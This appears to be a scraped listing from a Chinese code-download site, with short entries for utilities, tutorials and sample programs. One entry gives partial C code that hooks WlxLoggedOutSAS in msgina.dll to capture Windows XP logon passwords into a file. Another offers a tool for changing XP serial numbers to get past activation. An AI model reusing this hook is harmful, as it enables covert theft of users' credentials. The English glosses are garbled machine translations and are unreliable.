-
用于关闭Windows信使服务弹出窗口的小程序,使用Delphi6编写,调用相关的API函数。最经典之处在于发现了WindowsNT5系列的OS(XP&2K)的...
用于关闭Windows信使服务弹出窗口的小程序,使用Delphi6编写,调用相关的API函数。最经典之处在于发现了WindowsNT5系列的OS(XP&2K)的信史服务弹出窗体中,信使服务四个字后面有一个空格。-closed for the Windows Messenger Service pop-up window to the small, the use of Delphi6 preparation, call the API function. The most classic is that WindowsNT5 found a series of OS (XP2K) messenger service pop-up window, the courier services are the words behind a box.
- 2022-01-28 03:19:37下载
- 积分:1
-
Teach Yourself Borland C++ Builder in 21 Days.
Teach Yourself Borland C++ Builder in 21 Days.
- 2022-02-06 05:47:26下载
- 积分:1
-
a test for each of the input and output of SR does not contain redundant after t...
针对每一个测试的输入,输出化简后不包含多余括号的表达式。注意化简只是去掉多余的括号,不是进行数学变换。-a test for each of the input and output of SR does not contain redundant after the brackets expression. Simplification is to remove redundant brackets, not mathematical transform.
- 2022-02-12 16:41:21下载
- 积分:1
-
C++代码
把C代码转为DELPHI,国外牛人写的.-C CODE TO DELPHI
- 2022-08-31 11:05:03下载
- 积分:1
-
RayleighChan
然后利用Linear或DFT插植 RayleighChan %在同一个符号中选择子载波作导频%通道: awgn 信道下,的士,到来,途中,停车%仅在Taxi1部分给出详细注释由于各部分大同小异%所有的信道仅对ChannelAeroT1做了详细的注释注意 %! = 由于后期经过修改,程序中,NumSubc指的事载有信息的子载波数,%而NumSubc+Numpps为子载波总数,其中Numpps为导频数(需为128的约数加1)%修改纪录:(1) 2008年-01-21%将SNR步进改为2dB%(2) 2008年-02-28 $$$ 1提供的减轻ICI和噪声的方法启用标志sigLp
- 2023-08-08 05:20:03下载
- 积分:1
-
windows socket编程示例
windows socket编程示例-windows socket programming paradigm
- 2023-09-02 12:20:03下载
- 积分:1
-
Linux下基于SDL库的坦克打飞机游戏
Linux下基于SDL库的坦克打飞机游戏.先配置好SDL库,编译时用-LSDL就好
- 2022-04-20 13:50:13下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
jsp网上商城
一、系统开发环境为myEclipse,应用服务器为Tomcat,数据库环境为同时兼容MySql5.0、 Sqlserver2000、Sqlserver2005和Oracle,方便您选择和移植。二、系统采用B/S架构,开发同时通过IE、FireFox和Chrome等主流浏览器测试,使系统UI具备较强的兼容性。Web前台使用到的技术包括HTML、CSS等。三、系统采用struts+servlet+jsp架构进行开发,沿用MVC思想,使得项目层次更加清晰,提高了系统的安全性和可扩展性,方便功能扩展与二次开发。
- 2023-06-15 14:35:11下载
- 积分:1
-
Windows++XP++PRO++VLK序列号修改
使用此文件修改无法激活的windowsxp系统...
Windows++XP++PRO++VLK序列号修改
使用此文件修改无法激活的windowsxp系统-Windows++ XP++ PRO++ VLK serial number of amendments to revise the use of this file can not be activated windowsxp system
- 2022-12-30 01:15:03下载
- 积分:1